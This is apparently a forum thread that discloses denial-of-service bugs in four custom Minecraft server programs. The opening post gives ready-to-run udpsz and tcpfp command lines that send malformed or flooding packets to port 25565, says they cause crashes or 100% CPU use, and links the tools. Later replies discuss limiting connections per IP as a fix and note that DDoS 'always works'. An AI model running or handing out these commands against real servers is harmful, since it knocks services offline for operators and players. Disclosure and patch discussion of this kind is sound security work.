Just a quick and dirty check I did on the custom servers available for Minecraft.
The following is the list with directly the command to verify them:

Code:
MCServer
http://www.mc-server.org/
version: r172

    http://SERVER:8080/aaaaaaaaaaaa...1000_'a's...aaa
    udpsz -C 027fff -b a -T SERVER 25565 0x8002
    udpsz -C 3b -b 0x7f -T SERVER 25565 0x8002
    udpsz -C "01 00000000" -b 0x30 -T SERVER 25565 0x6072
    udpsz -C 0d -b 0x00 -T SERVER 25565 42

Code:
MCSharp
http://crafted.voziv.com/mcsharp/
version: 0.90

    tcpfp -m 80 -t 100 -f mcjoin.dat SERVER 25565

Code:
MineServer
http://mineserver.be/
version: 20110214013000

    udpsz -C "01 00000008 0001 69 0001 69 0000000000000000 00" -b 0x0f -T SERVER 25565 36

Code:
Opencraft
http://opencraft.sourceforge.net/
version: 0.3

    tcpfp -t 100 -f mcjoin.dat SERVER 25565

the problems can be crashes or cpu at 100% and so on.

links to the tools used in the test:
udpsz: http://aluigi.org/testz/udpsz.zip
tcpfp: http://aluigi.org/fakep/tcpfp.zip
mcjoin.dat is attached, it's a normal and basic join packet

tested it against my server software which is based on mcsharp, and it puts load on cpu, and player pool gets filled up

so i just limited the connection pool to one connection per ip, and that fixed the problem

Anyways, any updates on bugs in beta version?

as i said, if anyone is looking to patch these bugs, they can limit the connections in the connection pool to one per IP, assuming that that's how they work
It's a simple fix really

More Minecraft research would be awesome.

As for limiting connections by IP: it works, but it's not fun when players in the same house / dorm / etc. sharing the same public IP wan't to play at your server. But I guess it's definitely better than a server crash if you're getting attacked a lot.

DDoS always works. But you need a lot of IP's
